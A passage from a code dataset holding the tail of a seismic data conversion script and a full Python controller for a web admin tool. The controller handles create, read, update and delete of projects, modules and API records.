pickle.dump(filtered_data, nldic)\n nldic.close()\n","sub_path":"bmkg2hypodd.py","file_name":"bmkg2hypodd.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11246281","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n__author__ = 'DangGaofeng'\n\nfrom controllers.Base import Base\nfrom config.config import PAGE_LENGTH\nimport json\n\nservice = Base()\nproje = service.getPrjectService()\nmodel = service.getModelService()\napi = service.getApiService()\n#---------------project action----------------#\ndef project():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tpl = PAGE_LENGTH\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_project\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tret = proje.list_all(pg, pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\treturn service.render('manage/project.html', data=data)\ndef project_get():\n\tparams = service.get_params()\n\tret = proje.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"name\"] = ret[0][1]\n\t\tret_dict[\"desc\"] = ret[0][2]\n\treturn json.dumps(ret_dict)\ndef project_add():\n\tparams = service.get_params()\n\tret = proje.add(params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef project_edit():\n\tparams = service.get_params()\n\tret = proje.update_byid(int(params[\"id\"]), params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef project_delete():\n\tparams = service.get_params()\n\tret = proje.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n#-------------------model action-------------------#\ndef models():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tname = params.get(\"name\", \"\")\n\tpl = PAGE_LENGTH\n\tpid = int(params.get(\"pid\", 0))\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_models\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tdata[\"PAGER\"] = \"pid=\"+str(pid)\n\tdata[\"pid\"] = pid\n\tret = model.list_fuzzy(parent_id=pid, mod_name=name, pagenow=pg, pagesize=pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\tdata[\"project_list\"] = service.getProjectList()\n\treturn service.render('manage/modules.html', data=data)\ndef model_add():\n\tparams = service.get_params()\n\tproject_id = int(params[\"project_id\"])\n\tname = params['name']\n\tdesc = params['desc']\n\tret = model.add(project_id, name, desc)\n\treturn str(ret)\ndef model_get():\n\tparams = service.get_params()\n\tret = model.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif ret!=-1 and len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"pid\"] = ret[0][1]\n\t\tret_dict[\"name\"] = ret[0][2]\n\t\tret_dict[\"desc\"] = ret[0][3]\n\treturn json.dumps(ret_dict)\ndef model_edit():\n\tparams = service.get_params()\n\tret = model.update_byid(int(params[\"id\"]), int(params[\"project_id\"]), params[\"name\"], params[\"desc\"])\n\treturn str(ret)\ndef model_delete():\n\tparams = service.get_params()\n\tret = model.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n#-------------------api action----------------#\ndef apis():\n\tparams = service.get_params()\n\tpg = int(params.get(\"page\", 1))\n\tpl = PAGE_LENGTH\n\tpid = int(params.get(\"pid\", 0))\n\tmid = int(params.get(\"mid\", 0))\n\tname = params.get(\"name\", \"\")\n\tdata = {}\n\tdata[\"menu\"] = \"manage\"\n\tdata[\"sub_menu\"] = \"manage_api\"\n\tdata[\"pg\"] = pg\n\tdata[\"pl\"] = pl\n\tdata[\"PAGER\"] = \"pid=\"+str(pid)+\"&mid=\"+str(mid)\n\tdata[\"pid\"] = pid\n\tdata[\"mid\"] = mid\n\tdata[\"project_list\"] = service.getProjectList()\n\tdata[\"model_list\"] = service.getModelList(pid)\n\tret = api.list_fuzzy(parent_id=mid, intf_name=name, pagenow=pg, pagesize=pl)\n\tdata[\"count\"], data[\"lists\"] = 0, []\n\tif ret != -1:\n\t\tdata[\"count\"], data[\"lists\"] = ret\n\treturn service.render('manage/api.html', data=data)\ndef api_get():\n\tparams = service.get_params()\n\tret = api.get_byid(int(params[\"id\"]))\n\tret_dict = {}\n\tif len(ret) > 0:\n\t\tret_dict[\"id\"] = ret[0][0]\n\t\tret_dict[\"mid\"] = ret[0][2]\n\t\tret_dict[\"name\"] = ret[0][1]\n\t\tret_dict[\"method\"] = ret[0][3]\n\t\tret_dict[\"url\"] = ret[0][6]\n\t\tret_dict[\"desc\"] = ret[0][4]\n\t\tret_dict[\"wiki\"] = ret[0][5]\n\treturn json.dumps(ret_dict)\ndef api_add():\n\tparams = service.get_params()\n\tmid = int(params.get(\"model_id\", 0))\n\tmethod = params.get(\"method\", \"GET\")\n\tname = params.get(\"name\", \"\")\n\turl = params.get(\"url\", \"\")\n\twiki = params.get(\"wiki\", \"\")\n\tdesc = params.get(\"desc\", \"\")\n\tret = api.add(mid, name, method, url, desc, wiki)\n\treturn str(ret)\ndef api_edit():\n\tparams = service.get_params()\n\tid = int(params.get(\"id\", 0))\n\tmid = int(params.get(\"model_id\", 0))\n\tmethod = params.get(\"method\", \"GET\")\n\tname = params.get(\"name\", \"\")\n\turl = params.get(\"url\", \"\")\n\twiki = params.get(\"wiki\", \"\")\n\tdesc = params.get(\"desc\", \"\")\n\tret = api.update_byid(id, mid, name, method, url, desc, wiki)\n\treturn str(ret)\ndef api_delete():\n\tparams = service.get_params()\n\tret = api.delete_byid(int(params[\"id\"]))\n\treturn str(ret)\n\n#--------------一些方法----------------------#\n\ndef ajaxGetModelList():\n\tparams = service.get_params()\n\tpid = int(params.get(\"pid\", 0))\n\treturn json.dumps(service.getModelList(pid))\n\n#----------------在此以上增加代码------------------\nfunctions = {\n\t\"project\": project,\n\t\"project_get\": project_get,\n\t\"project_add\": project_add,\n\t\"project_edit\": project_edit,\n\t\"project_delete\": project_delete,\n\t\"models\": models,\n\t\"model_get\": model_get,\n\t\"model_add\": model_add,\n\t\"model_edit\": model_edit,\n\t\"model_delete\": model_delete,\n\t\"api\": apis,\n\t\"api_get\": api_get,\n\t\"api_add\": api_add,\n\t\"api_edit\": api_edit,\n\t\"api_delete\": api_delete,\n\t\"getModelByPid\": ajaxGetModelList\n}\ndef page(action=\"\"):\n\tif action not in functions:\n\t\treturn service.render('base_page/404.html', code=404)\n\treturn functions[action]()","sub_path":"controllers/Manage.py","file_name":"Manage.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}